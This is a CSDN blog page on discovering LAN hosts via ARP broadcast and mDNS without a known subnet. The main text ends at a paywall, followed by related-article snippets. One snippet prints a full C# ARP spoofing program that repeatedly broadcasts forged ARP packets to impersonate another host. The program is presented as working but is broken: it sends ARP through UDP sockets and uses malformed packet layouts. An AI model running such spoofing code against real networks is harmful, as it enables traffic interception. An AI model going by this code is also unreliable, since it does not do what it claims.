IP探测实现 ARP与设备发现

最新推荐文章于 2024-08-03 16:35:32 发布
最新推荐文章于 2024-08-03 16:35:32 发布
阅读量1w 收藏 14
点赞数 1
分类专栏: 网络 文章标签: IP探测 ARP 设备发现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LIFEXX/article/details/52901830
版权
本文探讨了在不知道IP子网掩码和网关的情况下,如何实现局域网内的设备发现。通过ARP广播和mDNS协议,可以在同一物理网络段上探测主机IP。ARP广播受限于同一链路,而mDNS则能在没有传统DNS服务器的小型网络内实现主机互相发现。此外,文章提到了SSDP和LLMNR等组播协议在设备发现中的作用,但它们可能无法穿越路由。
摘要由CSDN通过智能技术生成

        前几天遇到个需求,要探测局域网内 PC机的 IP,有可能跨网段,但是在同一个交换机;于是果断从网上下载了一个DEMO,可以填写探测的IP地址范围,扫描出范围内的主机IP; 抓包看了下,发现一堆icmp包,看来是通过枚举ping实现的;

        准备交差的时候被告知 负责探测的主机并不知道其他主机的IP,也不知道IP子网掩码和网关什么的,这样的话没法填写IP段,下载的这个DEMO就没什么用了......然后找了下设备同事,得知可以通过ARP广播实现;但是我印象中广播是不能跨网段的,只能在本子网中进行广播,但是同事又说是可以的,所以只能百度了,度娘解释如下:

    1)受限广播

      它不被路由发送,但会被送到相同物理网络段上的所有主机;

        IP地址的网络字段和主机字全为1就是地址255.255.255.255

    2)直接广播

         网络广播会被路由,并会发送到专门网络上

最低0.47元/天 解锁文章
豆笔来巡山
关注
专栏目录
主动信息搜集:基于ARP的主机发现
Liu_Bruce的博客
04-17 3442
主动信息搜集:基于ARP的主机发现ARP协议(地址解析协议)属于数据链路层的协议,主要负责根据网络层地址(IP)来获取数据链路层地址(MAC)。以太网协议规定,同一局域网中的一台主机要和另一台主机进行直接通信,必须知道目标主机的MAC地址。而在TCP/IP中,网络层只关注目标主机的IP地址。这就导致在以太网中使用IP协议时,数据链路层的以太网协议收到的网络层协议提供的数据中,只包含目的主机的IP地址。于是需要ARP协议来完成IP地址到MAC地址到转换。如下图的以太网(Ethernet)结构图: 在
arp探测局域网中的主机
04-14
windows下用WinpCap发送arp数据包,探测某一ip地址的主机是否在线
ARP包的探索
weixin_34092370的博客
11-27 76
ARP封装在帧中。 提示:点击查看大图 拓扑图 ARP请求 ARP响应 本文转自 天涯飞客 51CTO博客,原文链接:http://blog.51cto.com/425093014/1059350,如需转载请自行联系原作者 ...
【mDNS协议】通过UDP广播在局域网内实现设备自动发现和连接的协议
最新发布
Thmos_vader的嵌入式学习笔记
08-03 732
mDNS是一种通过UDP广播在局域网内实现设备自动发现和连接的协议,广泛应用于打印机发现、IoT设备连接、文件共享和软件服务扩展等场景。 典例为利用mdns协议用c/c++实现一套服务发现机制(含客户端和服务端),如将mqtt服务器地址mqtts://tb.com 通过协议发送给客户端。
16.2 ARP 主机探测技术
热门推荐
CSDN
10-21 1万+
ARP (Address Resolution Protocol,地址解析协议),是一种用于将 `IP` 地址转换为物理地址(`MAC地址`)的协议。它在 `TCP/IP` 协议栈中处于链路层,为了在局域网中能够正确传输数据包而设计,由协议数据单元和对应的操作命令组成。`ARP` 既可以由操作系统处理,也可以由网卡处理。 该协议的作用是通过一个局域网上的互联网协议(IP)地址来查询对应的物理硬件地址,如数据包发送到路由器时,ARP 协议将使用嵌入在数据包中的目的 IP 地址查找对应的物理地址,路由器根据获
探测IP小工具
01-08
《探究“探测IP小工具”:利用ARP与WinPcap技术揭示网络真相》 在信息技术领域,网络通信是核心组成部分,而理解网络通信机制对于排查问题、优化网络性能至关重要。本文将聚焦于一款名为“探测IP小工具”的应用程序...
局域网IP探测
08-19
在IT领域,局域网(LAN)IP探测是一项基础但重要的网络管理任务,它涉及到对本地网络中的设备进行识别和定位。局域网IP探测的主要目的是查找并确定网络上所有设备IP地址,以便进行网络配置、故障排查、网络安全...
IP探测器(安全与保密)
01-03
在描述中,“在局域网中搜索IP地址,查找IP地址的相关信息”表明IP探测器能够扫描网络,发现并收集网络设备IP地址信息。这些信息可能包括设备类型、MAC地址、在线状态、开放的服务端口等。通过这些信息,网络管理...
局域网ip探测
01-10
基于给定的网关探测该网段内所有在线客户端ip
Zippy-Ip-Scanner:免费的开源 IP 扫描仪-开源
06-28
Zippy Ip Scanner 是一个免费、开源的跨平台 IP 扫描应用程序,用 Python 编写。
自己制作的IP检测工具
04-05
使用CMD命令制作而成的IP检测工具,可以快速检测设置IP段内IP已用IP(不含被防火墙阻止的IP)和空闲IP,可以用于局域网IP检测,也可以用于外网IP检测,适合检测子网掩码为 255.255.255.0 的网段,如:192.168.0.1 - 192.168.0.254(输入IP段:192.168.0) 。如果检测外网IP遇到一些比较慢的IP可能会检测超时,可是适当改大后面代码中的数字10(单位:毫秒),改大会导致检测速度变慢。“ping %ips%.%%i -n 1 -w 10 > %temp%\testip.txt”
使用ARP协议发现网络中的主机
Zfrong繁荣的IT技术、IT项目、解决方案专栏Blog-上海
11-08 1461
网上存在很多关于ARP的文章,大多都是关于ARP欺骗,这里介绍ARP的另类用法:探测目标主机是否处于活动状态。传统探测远程主机是否存活的方法是通过ICMP协议中的回显应答报文来探测(ping)。随着对安全的越来越多的了解和重视,很多主机为了避免被扫描探测,通过防火墙将ICMP包屏蔽,从而达到在网络中隐藏的目的。这里我们介绍一下利用ARP协议探测网络中的活动主机的思路,这种方法的缺点只能探测以太网
基于ARP的活跃主机发现
qq_45887590的博客
03-10 606
基于ARP的活跃主机发现ARP协议简介ARP实现的活跃主机扫描程序 ARP协议简介 ARP 的中文名字是 “地址解析协议”,主要用在以太网中。 这里有一点需要明确的是, 所有的主机在互联网中通信的时候使用的是 IP 地址,而在以太网中通信时使用的却是硬件地 址(也就是常说的 MAC 地址)。 既然在以太网中无法使用 IP 地址通信,那么这些没有考虑过硬件地址的网络应用又是如何工作的呢? 几乎所有的网络应用都能在以太网中正常工作,这其实就是依靠了刚刚提到过的 ARP, 这个协议用来在只知道 IP 地址的情况下
渗透&&探测 (之ARP探测篇)
weixin_34409357的博客
09-20 2371
题记 hacker A hacker is any highly skilled computer expert. script kiddie A script kiddie is an unskilled individual who uses scripts or programs developed by others to attach computer systems and netw...
pythonarp工具_Python 实现ARP扫描欺骗工具
weixin_39900531的博客
12-05 435
实现简单的ARP扫描工具: 传入扫描参数main.py -a 192.168.1.1-100 扫描网段内所有的在线主机并显示其MAC地址.from scapy.all import *from optparse import OptionParserimport threadingdef parse_ip(targets):_split = targets.split('-')first_ip =...
ARP探测目标工具arping常用命令集合大学霸IT达人
大学霸__IT达人
07-22 704
ARP探测目标工具arping常用命令集合大学霸IT达人 ARP协议是一种将IP地址转化物理地址的协议。通过ARP请求包和响应包,可以判断一个IP地址是否在使用。同理,通过该协议可以探测局域网主机是否开启。arping是一款ARP探测目标工具,该工具不仅可以发送ARP请求,判断一个主机是否在线,还可以发送免费包更新其他主机的ARP缓存。 ...
一个通过捕获ARP发现IP的小工具
smstong的成长轨迹
01-08 3481
0 由来公司接入层交换机划分了很多Vlan,每个Vlan对应一个IP子网,各个房间所属Vlan号非常混乱。有时候,电脑IP丢失或新配电脑时,不能知道到底该配置那个IP网段。解决办法就是,登录交换机,查看电脑MAC出现在哪一个交换机Vlan中。问题是,这需要额外的能正常上网的计算机来登录交换机。是否有其他方法能知道一个给定端口的IP段呢?方法是有的,那就是直接使用链路层的以太网来捕获ARP包,并从中
c#实现arp探测攻击
05-18
ARP探测攻击,也被称为ARP欺骗攻击,是一种网络安全攻击方式。实现ARP探测攻击可以使用C#编程语言,下面是一份简单的代码示例: ```csharp using System; using System.Net; using System.Net.NetworkInformation; using System.Net.Sockets; namespace ARPAttack { class Program { static void Main(string[] args) { // 获取本机IP地址 string hostName = Dns.GetHostName(); IPAddress[] addresses = Dns.GetHostAddresses(hostName); IPAddress localIP = null; foreach (IPAddress address in addresses) { if (address.AddressFamily == AddressFamily.InterNetwork) { localIP = address; break; } } // 获取网关的MAC地址 PhysicalAddress gatewayMac = null; using (Ping ping = new Ping()) { PingReply reply = ping.Send(localIP); if (reply.Status == IPStatus.Success) { IPAddress gatewayIP = IPAddress.Parse("192.168.1.1"); // 假设网关IP地址为192.168.1.1 ArpPacket arpRequest = new ArpPacket(localIP, gatewayIP); byte[] requestBuffer = arpRequest.ToBytes(); using (UdpClient udpClient = new UdpClient()) { udpClient.Send(requestBuffer, requestBuffer.Length, new IPEndPoint(gatewayIP, 0)); IPEndPoint remoteEP = new IPEndPoint(IPAddress.Any, 0); byte[] responseBuffer = udpClient.Receive(ref remoteEP); ArpPacket arpResponse = ArpPacket.FromBytes(responseBuffer); if (arpResponse.Operation == ArpOperation.Response) { gatewayMac = arpResponse.SenderHardwareAddress; } } } } // 发送ARP欺骗包 while (true) { ArpPacket arpSpoof = new ArpPacket(localIP, IPAddress.Parse("192.168.1.100"), gatewayMac); byte[] spoofBuffer = arpSpoof.ToBytes(); using (UdpClient udpClient = new UdpClient()) { udpClient.Send(spoofBuffer, spoofBuffer.Length, new IPEndPoint(IPAddress.Broadcast, 0)); } System.Threading.Thread.Sleep(1000); } } } public class ArpPacket { public const int HardwareAddressLength = 6; public const int ProtocolAddressLength = 4; public const int PacketLength = 28; public PhysicalAddress DestinationHardwareAddress { get; set; } public PhysicalAddress SenderHardwareAddress { get; set; } public ushort ProtocolType { get; set; } public ArpOperation Operation { get; set; } public IPAddress SenderProtocolAddress { get; set; } public IPAddress TargetProtocolAddress { get; set; } public ArpPacket(IPAddress senderProtocolAddress, IPAddress targetProtocolAddress, PhysicalAddress destinationHardwareAddress = null, PhysicalAddress senderHardwareAddress = null) { this.DestinationHardwareAddress = destinationHardwareAddress ?? PhysicalAddress.Broadcast; this.SenderHardwareAddress = senderHardwareAddress ?? GetLocalMACAddress(); this.ProtocolType = (ushort)EthernetType.Arp; this.Operation = ArpOperation.Request; this.SenderProtocolAddress = senderProtocolAddress; this.TargetProtocolAddress = targetProtocolAddress; } public byte[] ToBytes() { byte[] buffer = new byte[PacketLength]; this.DestinationHardwareAddress.GetAddressBytes().CopyTo(buffer, 0); this.SenderHardwareAddress.GetAddressBytes().CopyTo(buffer, HardwareAddressLength); BitConverter.GetBytes(IPAddress.NetworkToHostOrder(this.ProtocolType)).CopyTo(buffer, HardwareAddressLength * 2); BitConverter.GetBytes((ushort)this.Operation).CopyTo(buffer, HardwareAddressLength * 2 + ProtocolAddressLength); this.SenderHardwareAddress.GetAddressBytes().CopyTo(buffer, HardwareAddressLength * 2 + ProtocolAddressLength + 2); this.SenderProtocolAddress.GetAddressBytes().CopyTo(buffer, HardwareAddressLength * 2 + ProtocolAddressLength + 2 + HardwareAddressLength); this.DestinationHardwareAddress.GetAddressBytes().CopyTo(buffer, HardwareAddressLength * 2 + ProtocolAddressLength + 2 + HardwareAddressLength + ProtocolAddressLength); this.TargetProtocolAddress.GetAddressBytes().CopyTo(buffer, HardwareAddressLength * 2 + ProtocolAddressLength + 2 + HardwareAddressLength + ProtocolAddressLength + HardwareAddressLength); return buffer; } public static ArpPacket FromBytes(byte[] buffer) { PhysicalAddress destinationHardwareAddress = new PhysicalAddress(buffer, 0, HardwareAddressLength); PhysicalAddress senderHardwareAddress = new PhysicalAddress(buffer, HardwareAddressLength, HardwareAddressLength); ushort protocolType = (ushort)IPAddress.NetworkToHostOrder(BitConverter.ToInt16(buffer, HardwareAddressLength * 2)); ArpOperation operation = (ArpOperation)BitConverter.ToUInt16(buffer, HardwareAddressLength * 2 + ProtocolAddressLength); PhysicalAddress targetHardwareAddress = new PhysicalAddress(buffer, HardwareAddressLength * 2 + ProtocolAddressLength + 2 + HardwareAddressLength + ProtocolAddressLength, HardwareAddressLength); IPAddress senderProtocolAddress = new IPAddress(BitConverter.ToUInt32(buffer, HardwareAddressLength * 2 + ProtocolAddressLength + 2)); IPAddress targetProtocolAddress = new IPAddress(BitConverter.ToUInt32(buffer, HardwareAddressLength * 2 + ProtocolAddressLength + 2 + HardwareAddressLength + ProtocolAddressLength + HardwareAddressLength)); return new ArpPacket(senderProtocolAddress, targetProtocolAddress, destinationHardwareAddress, senderHardwareAddress) { ProtocolType = protocolType, Operation = operation }; } private static PhysicalAddress GetLocalMACAddress() { NetworkInterface[] nics = NetworkInterface.GetAllNetworkInterfaces(); PhysicalAddress macAddress = null; foreach (NetworkInterface adapter in nics) { if (adapter.OperationalStatus == OperationalStatus.Up) { macAddress = adapter.GetPhysicalAddress(); if (macAddress != null && !macAddress.Equals(PhysicalAddress.None)) { break; } } } return macAddress; } } public enum ArpOperation : ushort { Request = 1, Response = 2 } public enum EthernetType : ushort { Arp = 0x0806 } } ``` 上面的代码中,我们先获取本机的IP地址和MAC地址,然后发送一个ARP请求包到网关获取网关的MAC地址。接着,我们每秒钟发送一个ARP欺骗包,将本机的MAC地址伪装成另外一台机器的MAC地址,从而实现ARP欺骗攻击。 需要注意的是,ARP欺骗攻击是一种违法行为,未经授权使用可能会导致法律后果。本代码仅供学习和研究用途,请勿用于非法用途。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值